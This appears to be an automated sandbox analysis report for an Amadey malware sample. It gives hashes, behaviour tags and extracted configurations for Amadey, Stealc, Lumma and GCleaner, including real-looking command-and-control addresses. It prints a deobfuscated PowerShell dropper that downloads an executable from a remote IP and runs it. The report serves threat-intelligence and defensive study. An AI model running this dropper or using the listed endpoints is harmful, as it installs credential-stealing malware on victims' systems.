amadey

General

Target

afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
Size

1.9MB
Sample

250125-t6sw2s1nby
MD5

b58f41c35fe6b79046d9aa084a175eb9
SHA1

7b18e2694be1d189282b8b59f391e298aa9d88ee
SHA256

afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
SHA512

7e9bd888e41a2bb3f07f5f63d236ee491c5265ef6014f9adee03411276d53d104511a00eddb5653663e037561fe0c84b7c0d986ac4f3332fa4c1928d837bcccf
SSDEEP

24576:pVSxYYf9Y/cLwPA5g3whoyTMZbBlJhRi6JAYcuR45J5XKCHat/STYu0ZnebEone5://TPAowhZMfbiPYFG5fFHGugneAAPk

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$d = $env:temp + "K3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Targets

- Target
  
  afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
- Size
  
  1.9MB
- MD5
  
  b58f41c35fe6b79046d9aa084a175eb9
- SHA1
  
  7b18e2694be1d189282b8b59f391e298aa9d88ee
- SHA256
  
  afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
- SHA512
  
  7e9bd888e41a2bb3f07f5f63d236ee491c5265ef6014f9adee03411276d53d104511a00eddb5653663e037561fe0c84b7c0d986ac4f3332fa4c1928d837bcccf
- SSDEEP
  
  24576:pVSxYYf9Y/cLwPA5g3whoyTMZbBlJhRi6JAYcuR45J5XKCHat/STYu0ZnebEone5://TPAowhZMfbiPYFG5fFHGugneAAPk
Score

10^/10

amadey gcleaner lumma stealc 9c9aa5 brat defense_evasion discovery execution loader persistence stealer trojan
- Amadey
  Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
  trojan amadey
- Amadey family
  amadey
- GCleaner
  GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
  loader gcleaner
- Gcleaner family
  gcleaner
- Lumma Stealer, LummaC
  Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
  stealer lumma
- Lumma family
  lumma
- Stealc
  Stealc is an infostealer written in C++.
  stealer stealc
- Stealc family
  stealc
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
  defense_evasion
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Run Powershell and hide display window.
  execution
- Downloads MZ/PE file
- Checks BIOS information in registry
  BIOS information is often read in order to detect sandboxing environments.
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Executes dropped EXE
- Identifies Wine through registry keys
  Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
  defense_evasion
- Loads dropped DLL
- Adds Run key to start application
  persistence
- AutoIT Executable
  AutoIT scripts compiled to PE executables.
- Enumerates processes with tasklist
  discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
behavioral1 behavioral2